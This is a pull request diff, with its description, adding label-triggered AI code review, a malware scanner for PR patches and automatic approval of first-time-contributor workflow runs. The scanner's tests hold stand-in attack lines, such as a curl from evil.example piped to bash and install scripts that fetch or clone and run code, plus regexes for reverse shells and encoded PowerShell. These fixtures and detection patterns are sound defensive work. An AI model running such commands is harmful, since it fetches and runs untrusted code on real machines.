       return { skipped: true as const, reason: 'not-maintainer' }
     }
+  }
+
+  if (
+    opts.eventName === 'pull_request' &&
+    isPullRequestLabeledEvent(opts.event) &&
+    !isAiReviewLabelEvent(opts.event)
+  ) {
+    return { skipped: true as const, reason: 'not-label' }
   }
 
   const pr = await fetchPullRequest(opts.client, opts.repo, parsed.prNumber)

--- a/agent-scripts/ai-review/run.ts
+++ b/agent-scripts/ai-review/run.ts
@@ -158,14 +158,14 @@ export function createGrokReview() {
       }),
       lifecycle: { reuse: 'none', destroyOnComplete: false },
     })
-    const result = await chat({
+    const stream = chat({
       adapter: grokBuildText('grok-4.6', {
         authMode: 'api-key',
         protocol: 'streaming-json',
         cwd: input.worktreeRoot,
         grokExecutable: join(homedir(), '.grok', 'bin', 'grok'),
       }),
-      debug: true,
+      stream: true,
       tools: createReviewTools({ worktreeRoot: input.worktreeRoot }),
       outputSchema: reviewVerdictSchema,
       middleware: [withSandbox(sandbox)],
@@ -192,7 +192,22 @@ export function createGrokReview() {
         },
       ],
     })
-    const verdict = parseVerdict(result)
+    let object: unknown
+    for await (const chunk of stream) {
+      console.log(JSON.stringify(chunk))
+      if (
+        chunk.type === 'CUSTOM' &&
+        chunk.name === 'structured-output.complete' &&
+        isRecord(chunk.value) &&
+        'object' in chunk.value
+      ) {
+        object = chunk.value.object
+      }
+    }
+    if (object === undefined) {
+      throw new Error('chat() did not emit structured-output.complete')
+    }
+    const verdict = parseVerdict(object)
     console.log('ai-review verdict', JSON.stringify(verdict, null, 2))
     return verdict
   }

--- a/agent-scripts/ai-review/run.ts
+++ b/agent-scripts/ai-review/run.ts
@@ -39,6 +39,7 @@ import {
   isPullRequestLabeledEvent,
   parseReviewEvent,
 } from './event.ts'
+import { createReviewStreamLogger } from './log.ts'
 import { commitAll, headRemoteUrl, pushHead } from './git.ts'
 import type { GitRunner } from './git.ts'
 import { setReviewState } from './labels.ts'
@@ -193,8 +194,9 @@ export function createGrokReview() {
       ],
     })
     let object: unknown
+    const log = createReviewStreamLogger()
     for await (const chunk of stream) {
-      console.log(JSON.stringify(chunk))
+      log.chunk(chunk)
       if (
         chunk.type === 'CUSTOM' &&
         chunk.name === 'structured-output.complete' &&
@@ -204,6 +206,7 @@ export function createGrokReview() {
         object = chunk.value.object
       }
     }
+    log.flush()
     if (object === undefined) {
       throw new Error('chat() did not emit structured-output.complete')
     }

--- a/agent-scripts/ai-review/run.ts
+++ b/agent-scripts/ai-review/run.ts
@@ -43,6 +43,8 @@ import { commitAll, headRemoteUrl, pushHead } from './git.ts'
 import type { GitRunner } from './git.ts'
 import { setReviewState } from './labels.ts'
 import { fetchPullRequest, fetchPullRequestDiff } from './pr.ts'
+import { approveWaitingWorkflows, setSecureLabel } from './secure.ts'
+import { scanPullSecurity } from './security.ts'
 import { shouldSkip } from './skip.ts'
 import { createReviewTools } from './tools.ts'
 import { parseVerdict, reviewLabelFor, reviewVerdictSchema } from './verdict.ts'
@@ -289,6 +291,23 @@ export async function runReviewJob(opts: {
   }
 
   const label = reviewLabelFor(verdict.verdict, pushLanded)
+  const security = scanPullSecurity(pr.files)
+  const markSecure = label === 'ai-ready' && security.ok
+  await setReviewState(opts.client, opts.repo, pr.number, label)
+  await setSecureLabel(opts.client, opts.repo, pr.number, markSecure)
+  let approvedRuns = 0
+  let approveError: string | null = null
+  if (markSecure) {
+    try {
+      approvedRuns = await approveWaitingWorkflows(
+        opts.client,
+        opts.repo,
+        pr.headSha,
+      )
+    } catch (error) {
+      approveError = error instanceof Error ? error.message : String(error)
+    }
+  }
   const findings = []
   for (const issue of verdict.issues) {
     findings.push(formatFinding(issue))
@@ -303,6 +322,12 @@ export async function runReviewJob(opts: {
       maintainerCanModify: pr.maintainerCanModify,
     }),
     label,
+    securityNote: securityNoteFor({
+      markSecure,
+      reasons: security.reasons,
+      approvedRuns,
+      approveError,
+    }),
   })
   await upsertReviewComment(
     opts.client,
@@ -311,8 +336,28 @@ export async function runReviewJob(opts: {
     body,
     opts.machineUserLogin,
   )
-  await setReviewState(opts.client, opts.repo, pr.number, label)
   return { skipped: false as const, verdict, label, pushLanded }
+}
+
+function securityNoteFor(input: {
+  markSecure: boolean
+  reasons: Array<string>
+  approvedRuns: number
+  approveError: string | null
+}) {
+  if (!input.markSecure) {
+    if (input.reasons.length > 0) {
+      return `blocked. Did not approve workflows.\n${input.reasons.map((reason) => `- ${reason}`).join('\n')}`
+    }
+    return 'Did not mark secure. Verdict is not ai-ready.'
+  }
+  if (input.approveError !== null) {
+    return `clean. Added label \`secure\`. Could not approve workflows: ${input.approveError}`
+  }
+  if (input.approvedRuns === 0) {
+    return 'clean. Added label `secure`. No waiting workflow runs.'
+  }
+  return `clean. Added label \`secure\`. Approved ${String(input.approvedRuns)} waiting workflow runs.`
 }
 
 function createProcessGitRunner(): GitRunner {

--- a/agent-scripts/ai-review/secure.test.ts
+++ b/agent-scripts/ai-review/secure.test.ts
@@ -1,0 +1,135 @@
+import { describe, expect, it } from 'vitest'
+import type { GitHubClient } from '../../scripts/maintainer/github.ts'
+import {
+  SECURE_LABEL,
+  approveWaitingWorkflows,
+  setSecureLabel,
+} from './secure.ts'
+
+const REPO = 'TanStack/ai'
+const ISSUE = 42
+const SHA = 'abc123def456'
+
+function readLabelName(body: unknown) {
+  if (
+    typeof body === 'object' &&
+    body !== null &&
+    'name' in body &&
+    typeof body.name === 'string'
+  ) {
+    return body.name
+  }
+  throw new Error('label body is missing name')
+}
+
+function readIssueLabelNames(body: unknown) {
+  if (
+    typeof body === 'object' &&
+    body !== null &&
+    'labels' in body &&
+    Array.isArray(body.labels)
+  ) {
+    return body.labels.filter(
+      (name): name is string => typeof name === 'string',
+    )
+  }
+  throw new Error('issue label body is missing labels')
+}
+
+function createFakeGitHub(options: { waitingIds?: Array<number> } = {}) {
+  const issueLabels = new Set<string>()
+  const repoLabels = new Set<string>()
+  const approved: Array<number> = []
+  const repoLabelsPath = `/repos/${REPO}/labels`
+  const issueLabelsPath = `/repos/${REPO}/issues/${ISSUE}/labels`
+
+  const client = {
+    graphql() {
+      throw new Error('graphql is unused')
+    },
+    async rest(method, path, body) {
+      if (method === 'GET' && path.startsWith(`/repos/${REPO}/actions/runs?`)) {
+        const params = new URL(`https://api.github.com${path}`).searchParams
+        if (params.get('head_sha') !== SHA) {
+          return { workflow_runs: [] }
+        }
+        const status = params.get('status')
+        const ids = status === 'waiting' ? (options.waitingIds ?? []) : []
+        return {
+          workflow_runs: ids.map((id) => ({ id, head_sha: SHA, status })),
+        }
+      }
+
+      if (method === 'POST' && path === repoLabelsPath) {
+        const name = readLabelName(body)
+        if (repoLabels.has(name)) {
+          throw new Error(`GitHub REST POST ${path} → HTTP 422: already exists`)
+        }
+        repoLabels.add(name)
+        return null
+      }
+
+      if (method === 'POST' && path === issueLabelsPath) {
+        for (const name of readIssueLabelNames(body)) {
+          issueLabels.add(name)
+        }
+        return null
+      }
+
+      if (method === 'DELETE' && path.startsWith(`${issueLabelsPath}/`)) {
+        const name = decodeURIComponent(
+          path.slice(`${issueLabelsPath}/`.length),
+        )
+        if (!issueLabels.has(name)) {
+          throw new Error(`GitHub REST DELETE ${path} → HTTP 404: Not Found`)
+        }
+        issueLabels.delete(name)
+        return null
+      }
+
+      const approve =
+        /^\/repos\/TanStack\/ai\/actions\/runs\/(\d+)\/approve$/.exec(path)
+      if (method === 'POST' && approve?.[1] !== undefined) {
+        approved.push(Number(approve[1]))
+        return null
+      }
+
+      throw new Error(`unexpected ${method} ${path}`)
+    },
+  } satisfies GitHubClient
+
+  return { client, issueLabels, repoLabels, approved }
+}
+
+describe('setSecureLabel', () => {
+  it('adds the secure label', async () => {
+    const github = createFakeGitHub()
+    await setSecureLabel(github.client, REPO, ISSUE, true)
+    expect([...github.issueLabels]).toEqual([SECURE_LABEL.name])
+    expect(github.repoLabels.has(SECURE_LABEL.name)).toBe(true)
+  })
+
+  it('removes the secure label and ignores a missing label', async () => {
+    const github = createFakeGitHub()
+    await setSecureLabel(github.client, REPO, ISSUE, true)
+    await setSecureLabel(github.client, REPO, ISSUE, false)
+    await setSecureLabel(github.client, REPO, ISSUE, false)
+    expect([...github.issueLabels]).toEqual([])
+  })
+})
+
+describe('approveWaitingWorkflows', () => {
+  it('approves waiting runs for this head SHA', async () => {
+    const github = createFakeGitHub({ waitingIds: [11, 22] })
+    const approved = await approveWaitingWorkflows(github.client, REPO, SHA)
+    expect(approved).toBe(2)
+    expect(github.approved).toEqual([11, 22])
+  })
+
+  it('approves nothing when no runs wait', async () => {
+    const github = createFakeGitHub({ waitingIds: [] })
+    const approved = await approveWaitingWorkflows(github.client, REPO, SHA)
+    expect(approved).toBe(0)
+    expect(github.approved).toEqual([])
+  })
+})

--- a/agent-scripts/ai-review/secure.ts
+++ b/agent-scripts/ai-review/secure.ts
@@ -1,0 +1,88 @@
+/**
+ * Mark a PR `secure` and approve waiting first-time-contributor workflow runs.
+ */
+
+import type { GitHubClient } from '../../scripts/maintainer/github.ts'
+
+export const SECURE_LABEL = {
+  name: 'secure',
+  color: '0e8a16',
+  description: 'AI review: no malware found. Waiting workflows were approved.',
+} as const
+
+function errorMentionsStatus(error: unknown, status: string) {
+  return error instanceof Error && error.message.includes(status)
+}
+
+function isRecord(value: unknown): value is Record<string, unknown> {
+  return typeof value === 'object' && value !== null && !Array.isArray(value)
+}
+
+function parseRunIds(raw: unknown, path: string) {
+  if (!isRecord(raw) || !Array.isArray(raw.workflow_runs)) {
+    throw new Error(`GitHub GET ${path} is missing workflow_runs`)
+  }
+  const ids = []
+  for (const run of raw.workflow_runs) {
+    if (!isRecord(run) || typeof run.id !== 'number') {
+      throw new Error(`GitHub GET ${path} has a run without id`)
+    }
+    ids.push(run.id)
+  }
+  return ids
+}
+
+/**
+ * Add or remove the `secure` label. Creates the repo label if it is missing.
+ */
+export async function setSecureLabel(
+  client: GitHubClient,
+  repo: string,
+  issueNumber: number,
+  on: boolean,
+) {
+  try {
+    await client.rest('POST', `/repos/${repo}/labels`, SECURE_LABEL)
+  } catch (error) {
+    if (!errorMentionsStatus(error, '422')) throw error
+  }
+
+  const issuePath = `/repos/${repo}/issues/${issueNumber}/labels/${encodeURIComponent(SECURE_LABEL.name)}`
+  if (!on) {
+    try {
+      await client.rest('DELETE', issuePath)
+    } catch (error) {
+      if (!errorMentionsStatus(error, '404')) throw error
+    }
+    return
+  }
+
+  await client.rest('POST', `/repos/${repo}/issues/${issueNumber}/labels`, {
+    labels: [SECURE_LABEL.name],
+  })
+}
+
+/**
+ * Approve workflow runs on this head SHA that wait for first-time-contributor
+ * approval. Returns how many approve calls succeeded.
+ */
+export async function approveWaitingWorkflows(
+  client: GitHubClient,
+  repo: string,
+  headSha: string,
+) {
+  const statuses = ['waiting', 'action_required']
+  const ids = new Set<number>()
+  for (const status of statuses) {
+    const path = `/repos/${repo}/actions/runs?head_sha=${encodeURIComponent(headSha)}&status=${status}&per_page=100`
+    const batch = parseRunIds(await client.rest('GET', path), path)
+    for (const id of batch) ids.add(id)
+  }
+
+  let approved = 0
+  for (const id of ids) {
+    await client.rest('POST', `/repos/${repo}/actions/runs/${id}/approve`)
+    approved += 1
+  }
+  return approved
+}

--- a/agent-scripts/ai-review/security.test.ts
+++ b/agent-scripts/ai-review/security.test.ts
@@ -24,7 +24,10 @@ describe('scanPullSecurity', () => {
       ]),
     ).toEqual({
       ok: false,
-      reasons: ['.github/workflows/ci.yml: adds pull_request_target'],
+      reasons: [
+        '.github/workflows/ci.yml: changes a workflow',
+        '.github/workflows/ci.yml: adds pull_request_target',
+      ],
     })
   })
 
@@ -69,7 +72,7 @@ describe('scanPullSecurity', () => {
     })
   })
 
-  it('ignores pull_request_target on a deleted line', () => {
+  it('alerts when a workflow file changes, even if the patch only deletes', () => {
     expect(
       scanPullSecurity([
         {
@@ -77,6 +80,41 @@ describe('scanPullSecurity', () => {
           patch: '@@ -1,2 +1,1 @@\n-  pull_request_target:\n on:\n',
         },
       ]),
-    ).toEqual({ ok: true, reasons: [] })
+    ).toEqual({
+      ok: false,
+      reasons: ['.github/workflows/ci.yml: changes a workflow'],
+    })
+  })
+
+  it('alerts on curl piped to /bin/bash', () => {
+    expect(
+      scanPullSecurity([
+        {
+          path: 'scripts/setup.sh',
+          patch:
+            '@@ -1 +1,2 @@\n #!/bin/sh\n+curl https://evil.example/x.sh | /bin/bash\n',
+        },
+      ]),
+    ).toEqual({
+      ok: false,
+      reasons: ['scripts/setup.sh: shell download or reverse shell'],
+    })
+  })
+
+  it('alerts on a package.json postinstall that clones then runs', () => {
+    expect(
+      scanPullSecurity([
+        {
+          path: 'packages/ai/package.json',
+          patch:
+            '@@ -1,3 +1,4 @@\n {\n+  "postinstall": "git clone ssh://git@host/repo /tmp/p && /tmp/p/install"\n }\n',
+        },
+      ]),
+    ).toEqual({
+      ok: false,
+      reasons: [
+        'packages/ai/package.json: "postinstall": "git clone ssh://git@host/repo /tmp/p && /tmp/p/install" fetches the network',
+      ],
+    })
   })
 })

--- a/agent-scripts/ai-review/security.test.ts
+++ b/agent-scripts/ai-review/security.test.ts
@@ -1,0 +1,82 @@
+import { describe, expect, it } from 'vitest'
+import { scanPullSecurity } from './security.ts'
+
+describe('scanPullSecurity', () => {
+  it('is clean for a normal source patch', () => {
+    expect(
+      scanPullSecurity([
+        {
+          path: 'packages/ai/src/chat.ts',
+          patch: '@@ -1,2 +1,3 @@\n line\n+return messages\n',
+        },
+      ]),
+    ).toEqual({ ok: true, reasons: [] })
+  })
+
+  it('alerts on pull_request_target in a workflow', () => {
+    expect(
+      scanPullSecurity([
+        {
+          path: '.github/workflows/ci.yml',
+          patch:
+            '@@ -1,2 +1,4 @@\n on:\n+  pull_request_target:\n+    types: [opened]\n',
+        },
+      ]),
+    ).toEqual({
+      ok: false,
+      reasons: ['.github/workflows/ci.yml: adds pull_request_target'],
+    })
+  })
+
+  it('alerts on curl piped to a shell', () => {
+    expect(
+      scanPullSecurity([
+        {
+          path: 'scripts/setup.sh',
+          patch:
+            '@@ -1 +1,2 @@\n #!/bin/sh\n+curl https://evil.example/x.sh | bash\n',
+        },
+      ]),
+    ).toEqual({
+      ok: false,
+      reasons: ['scripts/setup.sh: shell download or reverse shell'],
+    })
+  })
+
+  it('alerts on a package.json postinstall that fetches the network', () => {
+    expect(
+      scanPullSecurity([
+        {
+          path: 'packages/ai/package.json',
+          patch:
+            '@@ -1,3 +1,4 @@\n {\n+  "postinstall": "wget https://evil.example/x.js"\n }\n',
+        },
+      ]),
+    ).toEqual({
+      ok: false,
+      reasons: [
+        'packages/ai/package.json: "postinstall": "wget https://evil.example/x.js" fetches the network',
+      ],
+    })
+  })
+
+  it('alerts on a new binary path', () => {
+    expect(
+      scanPullSecurity([{ path: 'tools/helper.exe', patch: null }]),
+    ).toEqual({
+      ok: false,
+      reasons: ['tools/helper.exe: new binary or script payload'],
+    })
+  })
+
+  it('ignores pull_request_target on a deleted line', () => {
+    expect(
+      scanPullSecurity([
+        {
+          path: '.github/workflows/ci.yml',
+          patch: '@@ -1,2 +1,1 @@\n-  pull_request_target:\n on:\n',
+        },
+      ]),
+    ).toEqual({ ok: true, reasons: [] })
+  })
+})

--- a/agent-scripts/ai-review/security.ts
+++ b/agent-scripts/ai-review/security.ts
@@ -6,11 +6,13 @@
 export type PullFile = { path: string; patch: string | null }
 
 const BINARY_PATH = /\.(?:exe|dll|so|dylib|scr|bat|cmd|ps1)$/i
-const PIPE_SHELL = /(?:curl|wget|fetch)\b[^\n]{0,200}\|\s*(?:ba)?sh\b/i
+const PIPE_SHELL =
+  /(?:curl|wget|fetch)\b[^\n]{0,200}\|\s*(?:\S*\/)?(?:ba)?sh\b/i
 const POWERSHELL_ENC = /powershell(?:\.exe)?[^\n]{0,80}-enc(?:odedcommand)?\b/i
 const REVERSE_SHELL = /\/dev\/tcp\/|bash\s+-i\s+>&\s*\/dev\/tcp/i
 const LIFECYCLE = /"(?:preinstall|postinstall|prepublishOnly)"\s*:\s*"([^"]*)"/g
-const NETWORK = /https?:\/\/|curl\b|wget\b|invoke-webrequest\b|node\s+-e\b/i
+const NETWORK =
+  /https?:\/\/|curl\b|wget\b|invoke-webrequest\b|node\s+-e\b|git\s+clone\b/i
 
 function addedText(patch: string | null) {
   if (patch === null) return ''
@@ -48,10 +50,13 @@ export function scanPullSecurity(files: Array<PullFile>) {
       continue
     }
     const added = addedText(file.patch)
-    if (added.length === 0) continue
-    if (isWorkflowPath(file.path) && added.includes('pull_request_target')) {
-      reasons.push(`${file.path}: adds pull_request_target`)
+    if (isWorkflowPath(file.path)) {
+      reasons.push(`${file.path}: changes a workflow`)
+      if (added.includes('pull_request_target')) {
+        reasons.push(`${file.path}: adds pull_request_target`)
+      }
     }
+    if (added.length === 0) continue
     if (
       PIPE_SHELL.test(added) ||
       POWERSHELL_ENC.test(added) ||

--- a/agent-scripts/ai-review/security.ts
+++ b/agent-scripts/ai-review/security.ts
@@ -1,0 +1,72 @@
+/**
+ * Host-side malware scan for a PR file list. High-confidence alerts only.
+ * A clean scan is required before the bot adds `secure` or approves workflows.
+ */
+
+export type PullFile = { path: string; patch: string | null }
+
+const BINARY_PATH = /\.(?:exe|dll|so|dylib|scr|bat|cmd|ps1)$/i
+const PIPE_SHELL = /(?:curl|wget|fetch)\b[^\n]{0,200}\|\s*(?:ba)?sh\b/i
+const POWERSHELL_ENC = /powershell(?:\.exe)?[^\n]{0,80}-enc(?:odedcommand)?\b/i
+const REVERSE_SHELL = /\/dev\/tcp\/|bash\s+-i\s+>&\s*\/dev\/tcp/i
+const LIFECYCLE = /"(?:preinstall|postinstall|prepublishOnly)"\s*:\s*"([^"]*)"/g
+const NETWORK = /https?:\/\/|curl\b|wget\b|invoke-webrequest\b|node\s+-e\b/i
+
+function addedText(patch: string | null) {
+  if (patch === null) return ''
+  const lines = []
+  for (const line of patch.split('\n')) {
+    if (line.startsWith('+') && !line.startsWith('+++')) {
+      lines.push(line.slice(1))
+    }
+  }
+  return lines.join('\n')
+}
+
+function isWorkflowPath(path: string) {
+  return (
+    path.startsWith('.github/workflows/') ||
+    path.endsWith('/action.yml') ||
+    path.endsWith('/action.yaml') ||
+    path === 'action.yml' ||
+    path === 'action.yaml'
+  )
+}
+
+function isPackageJson(path: string) {
+  return /(^|\/)package\.json$/.test(path)
+}
+
+/**
+ * Return alert reasons for malware-shaped changes. Empty means clean.
+ */
+export function scanPullSecurity(files: Array<PullFile>) {
+  const reasons = []
+  for (const file of files) {
+    if (BINARY_PATH.test(file.path)) {
+      reasons.push(`${file.path}: new binary or script payload`)
+      continue
+    }
+    const added = addedText(file.patch)
+    if (added.length === 0) continue
+    if (isWorkflowPath(file.path) && added.includes('pull_request_target')) {
+      reasons.push(`${file.path}: adds pull_request_target`)
+    }
+    if (
+      PIPE_SHELL.test(added) ||
+      POWERSHELL_ENC.test(added) ||
+      REVERSE_SHELL.test(added)
+    ) {
+      reasons.push(`${file.path}: shell download or reverse shell`)
+    }
+    if (isPackageJson(file.path)) {
+      for (const match of added.matchAll(LIFECYCLE)) {
+        const script = match[1] ?? ''
+        if (NETWORK.test(script)) {
+          reasons.push(`${file.path}: ${match[0]} fetches the network`)
+        }
+      }
+    }
+  }
+  return { ok: reasons.length === 0, reasons }
+}


### PR DESCRIPTION
Add the `ai-review` label to start a review, including on maintainer PRs. Only a roster maintainer can start that path.

When the verdict is `ai-ready` and a host scan finds no malware, the bot adds `secure` and approves waiting first-time-contributor workflow runs. Then you can Approve and merge. You do not click **Approve and run workflows** first.

The job log prints text, reasoning, and tool input/output. It does not dump raw chunks.

`/ai-review` still works. Remove the `ai-review` label and add it again to run a second time.

## Changes

The workflow listens for `pull_request` `labeled` with name `ai-review` from AlemTuzlak, tombeckenham, or jherr. The script also checks `sender.login` against the roster.

After a review, `scanPullSecurity` blocks `pull_request_target`, curl-to-shell (including `/bin/bash`), network or `git clone` lifecycle scripts, binaries, and any change under `.github/workflows/`. If the verdict is `ai-ready` and the scan is clean, the bot approves waiting or `action_required` runs, then adds `secure` only if that call succeeds.

`createGrokReview()` uses `chat({ stream: true, outputSchema })`. A logger prints finished text, reasoning, and tool I/O. The verdict comes from `structured-output.complete`.

Skipped docs site: this is repo CI. No changeset: no published package change.

## Checklist

- [x] I have followed the steps in the [Contributing guide](https://github.com/TanStack/ai/blob/main/CONTRIBUTING.md).
- [ ] I have tested code changes locally with `pnpm run test:pr`, or these tests do not apply to this pull request.
- [x] I fully understand the code in this pull request, including any code generated with AI assistance.
- [x] Docs: I updated `docs/` for this change, or this change is not user-facing.
- [x] Changeset: I added a changeset (`pnpm changeset`), or this PR does not change a published package.

## Release Impact

- [ ] This change affects published code, and I have generated a [changeset](https://github.com/changesets/changesets/blob/main/docs/adding-a-changeset.md).
- [x] This change is docs/CI/dev-only (no release).

## Testing

1. **Commands run.** `pnpm exec nx run root:test:ai-review` — 13 files, 91 tests passed. I did not run `pnpm test:pr`.
2. **Manual test.**
   1. Open a first-time contributor PR that shows **Approve and run workflows**.
   2. Comment `/ai-review`, or add the `ai-review` label as a roster maintainer.
   3. Open the AI review job log. You must see `text:`, `reasoning:`, or `tool … input/output`, not raw chunk JSON.
   4. If the bot says `ai-ready` and `secure`, the Test checks must start without a UI click.
   5. A non-maintainer adding `ai-review`, a workflow-file change, or `pull_request_target` must not add `secure` and must not approve runs.
3. **How this PR makes testing easy.** Unit tests cover the label actor check, useful stream logging, a clean ready scan that approves waiting runs, an approval API error that does not leave `secure`, and malware or workflow-file scans that do not approve.

## Risk / rollback

The machine-user PAT must have `repo` so it can approve Actions runs. A false-clean scan would start CI on a bad PR. Changing any workflow file skips auto-approve. Tool output in the log is clipped at 4000 chars. Revert this PR to go back to label-less review and manual workflow approval.


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **New Features**
  * AI reviews can now be triggered by applying the `ai-review` label.
  * Clean reviews receive a `secure` label and can approve waiting workflows.
  * Added security checks for suspicious workflow, script, download, and binary changes.
  * Review comments now include security results.
  * Expanded live review logging for text, reasoning, tool activity, and errors.

* **Bug Fixes**
  * Unrelated pull-request labels no longer trigger manual AI reviews.

* **Documentation**
  * Documented label triggers, security behavior, permissions, and workflow output.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->